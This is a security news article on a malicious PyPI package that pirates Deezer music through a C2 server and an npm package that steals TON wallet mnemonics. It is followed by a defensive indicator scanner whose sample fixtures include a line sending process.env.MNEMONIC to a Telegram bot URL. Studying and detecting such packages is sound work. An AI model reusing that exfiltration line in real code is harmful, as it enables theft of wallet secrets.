
Malicious PyPI Package “automslc” Enables 104K+ Unauthorized Deezer Music Downloads


Feb 26, 2025 | Ravie Lakshmanan | Malware / Cryptocurrency


Cybersecurity researchers have flagged a malicious Python library on the Python Package Index (PyPI) repository that facilitates unauthorized music downloads from the music streaming service Deezer.

The package in question is automslc, which has been downloaded over 104,000 times to date. First published in May 2019, it remains available on PyPI as of writing.

“Although automslc, which has been downloaded over 100,000 times, purports to offer music automation and metadata retrieval, it covertly bypasses Deezer’s access restrictions by embedding hardcoded credentials and communicating with an external command-and-control (C2) server,” Socket security researcher Kirill Boychenko said in a report published today.


Specifically, the package is designed to log into the French music streaming platform via user-supplied and hard-coded credentials, gather track-related metadata, and download full audio files in violation of Deezer’s API terms.

The package also periodically communicates with a remote server located at “54.39.49[.]17:8031” to provide updates on the download status, thereby giving the threat actor centralized control over the coordinated music piracy operation.

Put differently, automslc effectively turns the systems of the package’s users into an illicit network for facilitating bulk music downloads in an unauthorized manner. The IP address is associated with a domain named “automusic[.]win,” which is said to be used by the threat actor to oversee the distributed downloading operation.


“Deezer’s API terms forbid the local or offline storage of full audio content, but by downloading and decrypting entire tracks, automslc bypasses this limitation, potentially placing users at risk of legal repercussions,” Boychenko said.

The disclosure comes as the software supply chain security company detailed a rogue npm package called @ton-wallet/create that has been found stealing mnemonic phrases from unsuspecting users and developers in the TON ecosystem, while impersonating the legitimate @ton/ton package.

The package, first published to the npm registry in August 2024, has attracted 584 downloads to date. It remains available for download.


The malicious functionality embedded into the library is capable of extracting the process.env.MNEMONIC environment variable, thereby giving threat actors full access to a cryptocurrency wallet and potentially draining a victim’s digital assets. The information is transmitted to an attacker-controlled Telegram bot.

“This attack poses severe supply chain security risks, targeting developers and users integrating TON wallets into their applications,” Socket said. “Regular dependency audits and automated scanning tools should be employed to detect anomalous or malicious behaviors in third-party packages before they’re integrated into production environments.”
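As an added example (not code from the article or from Socket), here is a small defender-side heuristic scanner for an unpacked package tree that looks for the indicators described above: the hard-coded C2 endpoint and domain, a literal IP:port pair, reads of the MNEMONIC environment variable, and calls to the Telegram Bot API. The sample snippets are constructed to mimic the reported behaviour and are not the real package contents.

```python
import re
from pathlib import Path

# Indicators quoted in the article (defanged there; written plainly so they match source text).
KNOWN_C2_IP = "54.39.49.17"
KNOWN_C2_DOMAIN = "automusic.win"

PATTERNS = {
    "known_c2_ip": re.compile(re.escape(KNOWN_C2_IP)),
    "known_c2_domain": re.compile(re.escape(KNOWN_C2_DOMAIN)),
    # Any literal IPv4:port pair; a library rarely needs one hard-coded.
    "hardcoded_ip_port": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}:\d{2,5}\b"),
    # Telegram Bot API endpoint, the exfiltration channel reported for @ton-wallet/create.
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot"),
    # Reads of MNEMONIC from JS (process.env) or Python (os.environ / os.getenv).
    "mnemonic_env_read": re.compile(
        r"process\.env\.MNEMONIC|environ\[\s*['\"]MNEMONIC['\"]\s*\]|getenv\(\s*['\"]MNEMONIC"
    ),
}

def scan_text(text, name="<buffer>"):
    """Return (file, indicator, matched text) triples for every pattern hit in text."""
    hits = []
    for label, rx in PATTERNS.items():
        for m in rx.finditer(text):
            hits.append((name, label, m.group(0)))
    return hits

def scan_tree(root):
    """Scan source-like files under an unpacked package directory (e.g. site-packages/<pkg>)."""
    hits = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in {".py", ".js", ".mjs", ".cjs", ".json"}:
            hits.extend(scan_text(path.read_text(errors="replace"), str(path)))
    return hits

# Constructed samples that mimic the reported behaviour; not the real package contents.
SAMPLE_PY = 'STATUS_URL = "http://54.39.49.17:8031/status"  # constructed\n'
SAMPLE_JS = ('const m = process.env.MNEMONIC;  // constructed\n'
             'fetch("https://api.telegram.org/bot<TOKEN>/sendMessage?text=" + m);\n')
SAMPLE_CLEAN = 'import requests\nrequests.get("https://pypi.org/simple/")\n'

if __name__ == "__main__":
    for sample in (SAMPLE_PY, SAMPLE_JS, SAMPLE_CLEAN):
        print(scan_text(sample) or "no indicators")
```

Run `scan_tree()` against a freshly installed dependency before promoting it; a hit is a prompt for manual review, not proof of malice.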

Update

The Python package “automslc” is no longer available for download from PyPI.
